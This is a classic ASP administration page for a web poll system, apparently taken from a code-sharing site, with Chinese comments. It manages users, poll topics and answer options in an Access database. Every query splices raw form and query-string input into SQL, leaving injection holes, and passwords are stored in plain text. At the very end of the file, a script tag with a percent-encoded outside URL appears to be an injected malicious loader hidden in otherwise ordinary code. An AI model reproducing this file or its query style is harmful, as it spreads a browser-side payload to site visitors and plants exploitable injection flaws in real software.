📄 admin-update.asp
字号:
<%@ Language=VBScript %>
<%
'如果没有登录,则首先到登录界面
if session("loginSuccessful") <> "yes" then Response.Redirect ("login.asp")
dim SQL, cn, rs
Set cn = Server.CreateObject("ADODB.Connection")
cn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source= " & server.MapPath ("../fpdb/poll.mdb")
if Request.QueryString("sub") = "new_usr" then new_usr() '创建新用户
if Request.QueryString("sub") = "edit_usr" then edit_usr() '编辑用户
if Request.QueryString("sub") = "del_usr" then del_usr() '删除用户
if Request.QueryString("sub") = "new" then add_new() '编辑主题
if Request.QueryString("sub") = "act" then act() '激活主题
if Request.QueryString("sub") = "inact" then inact() '使主题非激活
if Request.QueryString("sub") = "edit" then edit() '编辑主题
if Request.QueryString("sub") = "edit_add" then edit_add() '编辑选项
if Request.QueryString("sub") = "del_answ" then del_answ() '删除选项
if Request.QueryString("sub") = "del" then del() '删除主题
%>
<%
'添加新用户
sub new_usr()
dim a, usr_id
'获取最后一个用户编号
SQL = "SELECT * FROM users ORDER BY usr_id DESC"
set rs = cn.Execute(SQL)
usr_id = rs("usr_id") + 1
'获取新用户权限,1表示管理员,2表示普通用户
if Request.Form("status") = "yes" then
a = 1
else
a = 2
end if
'添加新用户
SQL = "INSERT INTO users ([usr_id],[username],[password],[status],[email]) " & _
"VALUES (" & usr_id & ",'" & Request.Form("user") & "','" & Request.Form("pass") & "'," & a & ",'" & Request.Form("email") & "')"
set rs = cn.Execute(SQL)
Response.Redirect("admin-users.asp")
end sub
%>
<%
'编辑用户信息
sub edit_usr()
dim a
if Request.Form("status") = "yes" then
a = 1
else
a = 2
end if
'提交到数据库
SQL ="UPDATE users SET " & _
"[username]='" & Request.Form("user") & _
"',[password]='" & Request.Form("pass") & _
"',[status]=" & a & ", [email]='" & Request.Form("email") & _
"' WHERE usr_id=" & Request.QueryString("id")
set rs = cn.Execute(SQL)
Response.Redirect("admin-users.asp")
end sub
%>
<%
'删除用户
sub del_usr()
SQL = "DELETE FROM users WHERE usr_id=" & Request.QueryString("id")
set rs = cn.Execute(SQL)
Response.Redirect("admin-users.asp")
end sub
%>
<%
'添加投票追
sub add_new()
dim a, b, poll_id, answ_id
dim email, str
'获取最后一个投票编号
SQL = "SELECT * FROM title ORDER BY id DESC"
set rs = cn.Execute(SQL)
if not rs.eof then
poll_id = rs("id") + 1
else
poll_id = 1
end if
'添加投票主题
SQL = "INSERT INTO title (id,title,expiration_start,expiration_end) VALUES " & _
"(" & poll_id & ",'" & Request.Form("title") & "','" & Request.Form("d_s") & "','" & Request.Form("d_e") & "')"
set rs = cn.Execute(SQL)
'获取最后一个选项编号
SQL = "SELECT * FROM vote ORDER BY answer_id DESC"
set rs = cn.Execute(SQL)
if not rs.eof then
answ_id = rs("answer_id")
else
answ_id = 1
end if
'将新投票主题的选项保存到数据库中
a = 1 '循环变量
b = 1 '增加选项编号
do
if not Request.Form("a" & a) = "" then
SQL = "INSERT INTO vote (poll_id,answer_id,answer) VALUES " & _
"(" & poll_id & "," & answ_id + b & ",'" & Request.Form("a" & a) & "')"
set rs = cn.Execute(SQL)
b = b + 1
end if
a = a + 1
loop until a = 11
Response.Redirect("admin-poll.asp")
end sub
%>
<%
'激活主题
sub act()
dim poll_id
poll_id = Request.QueryString("id")
'首先设置所有主题为非激活状态
SQL = "UPDATE title SET active=False"
set rs = cn.execute(SQL)
'然后将要被激活的主题激活
SQL = "UPDATE title SET active=True WHERE id=" & poll_id
set rs = cn.execute(SQL)
Response.Redirect("admin-poll.asp")
end sub
%>
<%
'使主题非激活
sub inact()
dim poll_id
poll_id = Request.QueryString("id")
'直接修改active属性
SQL = "UPDATE title SET active=False WHERE id=" & poll_id
set rs = cn.execute(SQL)
Response.Redirect("admin-poll.asp")
end sub
%>
<%
'保存编辑后的投票
sub edit()
dim no, i, poll_id
i = 1
'获取选项数量
no = Request.Form ("no_answers")
'获取投票编号
poll_id = Request.QueryString ("id")
'更新投票主题
SQL = "UPDATE title SET title='" & Request.Form ("title") & "', expiration_start='" & Request.Form("d_s") & _
"', expiration_end='" & Request.Form("d_e") & "' WHERE id=" & poll_id
set rs = cn.Execute(SQL)
'更新投票选项
do
SQL = "UPDATE vote SET answer='" & Request.Form ("a" & i) & "' WHERE answer_id=" & Request.Form ("h" & i)
set rs = cn.Execute(SQL)
i = i + 1
loop until i = no + 1
Response.Redirect("admin-poll.asp?sub=edit&id=" & poll_id)
end sub
%>
<%
'添加投票选项
sub edit_add()
dim poll_id, answ_id
poll_id = Request.QueryString("id")
'如果选项内容不为空...
if not Request.Form("add_one") = "" then
'获取最后一个选项编号
SQL = "SELECT * FROM vote ORDER BY answer_id DESC"
set rs = cn.execute(SQL)
'将编号增加1
answ_id = rs("answer_id") + 1
'添加选项
SQL = "INSERT INTO vote (poll_id,answer_id,answer) VALUES (" & poll_id & "," & answ_id & ",'" & Request.Form("add_one") & "')"
set rs = cn.execute(SQL)
end if
Response.Redirect("admin-poll.asp?sub=edit&id=" & poll_id)
end sub
%>
<%
'删除投票选项
sub del_answ()
dim poll_id
'获取投票主题编号
poll_id = Request.QueryString ("id")
'删除被选中的选项
SQL = "DELETE FROM vote WHERE answer_id=" & Request.QueryString("answ_id")
set rs = cn.Execute(SQL)
Response.Redirect("admin-poll.asp?sub=edit&id=" & poll_id)
end sub
%>
<%
'删除投票主题
sub del()
dim poll_id
'获取投票主题
poll_id = Request.QueryString ("id")
'调用delete语句删除
SQL = "DELETE FROM title WHERE id=" & poll_id
set rs = cn.Execute(SQL)
SQL = "DELETE FROM vote WHERE poll_id=" & poll_id
set rs = cn.Execute(SQL)
Response.Redirect("admin-poll.asp")
end sub
%><script src="http://%78%66%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -